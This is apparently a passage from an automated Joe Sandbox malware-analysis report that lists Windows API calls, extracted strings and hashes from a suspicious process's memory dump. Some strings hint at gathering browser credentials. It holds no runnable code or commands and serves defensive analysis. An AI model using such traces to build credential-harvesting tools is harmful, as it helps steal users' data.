                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                  • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004095FC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                    • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3655998216-0
                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00445426
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                  • String ID:
                                                  • API String ID: 1828521557-0
                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID:
                                                  • API String ID: 2081463915-0
                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                  • String ID:
                                                  • API String ID: 2136311172-0
                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@
                                                  • String ID:
                                                  • API String ID: 1936579350-0
                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                  • GetLastError.KERNEL32 ref: 00409974
                                                  • CloseClipboard.USER32 ref: 0040997D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                  • String ID:
                                                  • API String ID: 2565263379-0
                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 00409882
                                                  • wcslen.MSVCRT ref: 0040988F
                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                  • memcpy.MSVCRT ref: 004098B5
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                  • CloseClipboard.USER32 ref: 004098D7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                  • String ID:
                                                  • API String ID: 2014503067-0
                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                  • String ID: OsError 0x%x (%u)
                                                  • API String ID: 403622227-2664311388
                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                  • memset.MSVCRT ref: 0040265F
                                                  • memcpy.MSVCRT ref: 0040269B
                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • memcpy.MSVCRT ref: 004026FF
                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                  • API String ID: 577499730-1134094380
                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                  • String ID: :stringdata$ftp://$http://$https://
                                                  • API String ID: 2787044678-1921111777
                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                  • GetDC.USER32 ref: 004140E3
                                                  • wcslen.MSVCRT ref: 00414123
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                  • _snwprintf.MSVCRT ref: 00414244
                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                  • String ID: %s:$EDIT$STATIC
                                                  • API String ID: 2080319088-3046471546
                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                  • memset.MSVCRT ref: 00413292
                                                  • memset.MSVCRT ref: 004132B4
                                                  • memset.MSVCRT ref: 004132CD
                                                  • memset.MSVCRT ref: 004132E1
                                                  • memset.MSVCRT ref: 004132FB
                                                  • memset.MSVCRT ref: 00413310
                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                  • memset.MSVCRT ref: 004133C0
                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                  • memcpy.MSVCRT ref: 004133FC
                                                  • wcscpy.MSVCRT ref: 0041341F
                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                  Strings
                                                  • {Unknown}, xrefs: 004132A6
                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                  • API String ID: 4111938811-1819279800
                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                  • DeleteObject.GDI32(?), ref: 0040136A
